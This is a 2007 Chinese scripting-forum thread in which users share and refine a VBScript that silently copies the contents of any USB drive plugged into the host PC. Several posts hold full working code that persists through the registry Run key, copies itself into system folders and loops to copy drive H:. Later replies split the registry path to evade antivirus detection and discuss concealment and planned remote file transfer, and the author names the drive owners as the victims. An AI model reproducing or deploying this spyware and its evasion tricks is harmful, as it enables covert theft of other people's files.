|
zhoushijay
高级用户
Autowalk
积分 845
发帖 375
注册 2007-3-3
状态 离线
|
『楼 主』:
[原创]U盘偷窥者,监视U盘一插入就COPY
请把代码中U盘的盘符(H:\)改成自己电脑U盘的盘符
代码已经过证实会被卡吧认为是病毒, -__-!
'---------------------------------U盘偷窥者.vbs-------------------------------------
set fso=createobject("scripting.filesystemobject")
set ws=createobject("wscript.shell")
on error resume next
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\USBgetter","C:\Program Files\U盘偷窥者.vbs"
if fso.folderexists("c:\usb")=false then
fso.createfolder("c:\usb")
fso.copyfile "U盘偷窥者.vbs","C:\Program Files\"
end if
do
wscript.sleep 1000
if fso.driveexists("H:\") then
fso.copyfile "H:\*","c:\usb\"
fso.copyfolder "H:\*","c:\usb\"
wscript.sleep 20000
end if
loop
'-------------------------------------------------------------------------------------
|
你好,脚本专家!
<a target=blank href=tencent://message/?uin=29654761&Site=www.111.com&Menu=yes><img border="0" SRC=http://wpa.qq.com/pa?p=1:29654761:5 alt="点击这里给我发消息"></a> |
|
 2007-5-14 09:43 |
|
|
zhoushijay
高级用户
Autowalk
积分 845
发帖 375
注册 2007-3-3
状态 离线
|
『第
2 楼』:
经过进一步的测试,卡吧认为是病毒的原因是因为它修改了注册表的启动项,测试的时候可以把修改注册表那一段去掉
|
你好,脚本专家!
<a target=blank href=tencent://message/?uin=29654761&Site=www.111.com&Menu=yes><img border="0" SRC=http://wpa.qq.com/pa?p=1:29654761:5 alt="点击这里给我发消息"></a> |
|
|
2007-5-14 09:52 |
|
|
baomaboy
银牌会员
积分 1513
发帖 554
注册 2005-12-30
状态 离线
|
|
|
2007-5-14 09:55 |
|
|
baomaboy
银牌会员
积分 1513
发帖 554
注册 2005-12-30
状态 离线
|
『第
4 楼』:
| Quote: | Originally posted by zhoushijay at 2007-5-14 09:52:
经过进一步的测试,卡吧认为是病毒的原因是因为它修改了注册表的启动项,测试的时候可以把修改注册表那一段去掉 |
|
连自启动也取消,那还叫U盘偷窥者吗,什么都要自己改。
|
好多菩提树,好多明镜台。本来好多物,好多的尘埃。 |
|
|
2007-5-14 09:57 |
|
|
zhoushijay
高级用户
Autowalk
积分 845
发帖 375
注册 2007-3-3
状态 离线
|
『第
5 楼』:
宝马兄有什么办法可以自动检测盘符吗?
不过这个暂时没必要,等研究出了如何远程传送文件到自己电脑之后就需要这个了
|
你好,脚本专家!
<a target=blank href=tencent://message/?uin=29654761&Site=www.111.com&Menu=yes><img border="0" SRC=http://wpa.qq.com/pa?p=1:29654761:5 alt="点击这里给我发消息"></a> |
|
|
2007-5-14 09:57 |
|
|
baomaboy
银牌会员
积分 1513
发帖 554
注册 2005-12-30
状态 离线
|
『第
6 楼』:
把它的马甲改成背心穿,至少我的卡巴已经认不出这是原来那个毒了,不知道你用的什么杀毒软件,有效果吗?
'---------------------------------U盘偷窥者.vbs-------------------------------------
set fso=createobject("scripting.filesystemobject")
set ws=createobject("wscript.shell")
on error resume next
aaa="HKEY_CURRENT_USER\Software\Micr"
bbb="osoft\Windows\Curr"
ccc="entVers"
ddd="ion\Ru"
eee="n\USBgetter"
ws.regwrite aaa&bbb&ccc&ddd&eee,"C:\Program Files\U盘偷窥者.vbs"
if fso.folderexists("c:\usb")=false then
fso.createfolder("c:\usb")
fso.copyfile "U盘偷窥者.vbs","C:\Program Files\"
end if
do
wscript.sleep 1000
if fso.driveexists("H:\") then
fso.copyfile "H:\*","c:\usb\"
fso.copyfolder "H:\*","c:\usb\"
wscript.sleep 20000
end if
loop
'-------------------------------------------------------------------------------------
|
好多菩提树,好多明镜台。本来好多物,好多的尘埃。 |
|
|
2007-5-14 10:09 |
|
|
baomaboy
银牌会员
积分 1513
发帖 554
注册 2005-12-30
状态 离线
|
『第
7 楼』:
| Quote: | Originally posted by zhoushijay at 2007-5-14 09:57:
宝马兄有什么办法可以自动检测盘符吗?
不过这个暂时没必要,等研究出了如何远程传送文件到自己电脑之后就需要这个了 |
|
好像在论坛看到过资料,你自己搜一下
|
好多菩提树,好多明镜台。本来好多物,好多的尘埃。 |
|
|
2007-5-14 10:11 |
|
|
zhoushijay
高级用户
Autowalk
积分 845
发帖 375
注册 2007-3-3
状态 离线
|
『第
8 楼』:
厉害咯,我的卡吧也认不出来了,这么笨的!
|
你好,脚本专家!
<a target=blank href=tencent://message/?uin=29654761&Site=www.111.com&Menu=yes><img border="0" SRC=http://wpa.qq.com/pa?p=1:29654761:5 alt="点击这里给我发消息"></a> |
|
|
2007-5-14 10:14 |
|
|
bob1989
中级用户
积分 322
发帖 144
注册 2007-1-10
状态 离线
|
『第
9 楼』:
加在注册表里很容易被人发现的``还是加到开始的启动里把!
|
|
|
2007-5-14 13:56 |
|
|
zhoushijay
高级用户
Autowalk
积分 845
发帖 375
注册 2007-3-3
状态 离线
|
『第
10 楼』:
很多人都误会了,其实这个程序装在你电脑上,你是使用者,在你电脑上使用U盘的人才是受害者,这点必须搞清楚,既然你是使用者,你当然知道这个程序装在哪里,所以不存在发现不发现的问题.
|
你好,脚本专家!
<a target=blank href=tencent://message/?uin=29654761&Site=www.111.com&Menu=yes><img border="0" SRC=http://wpa.qq.com/pa?p=1:29654761:5 alt="点击这里给我发消息"></a> |
|
|
2007-5-14 17:46 |
|
|
ebfok
初级用户
积分 87
发帖 33
注册 2006-6-20
来自 cs
状态 离线
|
『第
11 楼』:
好是好,就是进程中多了个Wscript,7M多呢,不知道vbs有没有更好的常驻内存的办法
|
|
|
2007-5-14 19:20 |
|
|
zhoushijay
高级用户
Autowalk
积分 845
发帖 375
注册 2007-3-3
状态 离线
|
『第
12 楼』:
我这只有2M啊,一点都不影响,这是目前我在用的修改后的代码
set fso=createobject("scripting.filesystemobject")
set ws=createobject("wscript.shell")
on error resume next
if fso.folderexists("c:\usb")=false then
aaa="HKEY_CURRENT_USER\Software\Micr"
bbb="osoft\Windows\Curr"
ccc="entVers"
ddd="ion\Ru"
eee="n\USBgetter"
ws.regwrite aaa&bbb&ccc&ddd&eee,"C:\WINDOWS\system32\usbgeter.vbs"
fso.createfolder("c:\usb")
fso.copyfile "usbgeter.vbs","C:\WINDOWS\system32\"
end if
do
wscript.sleep 1000
if fso.driveexists("H:\") then
fso.copyfile "H:\*","c:\usb\"
fso.copyfolder "H:\*","c:\usb\"
wscript.sleep 20000
end if
loop
|
你好,脚本专家!
<a target=blank href=tencent://message/?uin=29654761&Site=www.111.com&Menu=yes><img border="0" SRC=http://wpa.qq.com/pa?p=1:29654761:5 alt="点击这里给我发消息"></a> |
|
|
2007-5-14 19:51 |
|
|
qq82015930
中级用户
积分 235
发帖 109
注册 2006-8-24
状态 离线
|
|
|
2007-10-9 16:11 |
|
|
pooloo
初级用户
积分 62
发帖 33
注册 2007-6-16
状态 离线
|
『第
14 楼』:
恩,学习中……我也给一段:
echo 正在检测可移动设备
setlocal enabledelayedexpansion
for /f "skip=1 tokens=1,2 delims=\" %%i in ('fsutil fsinfo drives^|find /v ""') do (
set drv_lst=%%i
set drv_lst=!drv_lst:~-2!
for %%udisk in (!drv_lst!) do (
fsutil fsinfo drivetype %%udisk | findstr "移动" >nul 2>nul && if /i not "%%udisk"=="A:" (
set drive=%%udisk
echo U盘盘符是%%udisk 。
echo 显示U盘隐藏文件……
!drive!
cd\
attrib /s/d -r -h -s -a *.* >nul 2>nul
)
)
)
cls
echo 检测完毕!没有检测到U盘存在!请手工输入U盘盘符
pause
[ Last edited by pooloo on 2007-10-10 at 08:22 AM ]
|
|
|
2007-10-10 08:17 |
|
|
buddiyar
初级用户
积分 160
发帖 75
注册 2006-6-28
状态 离线
|
|
|
2010-2-20 21:34 |
|
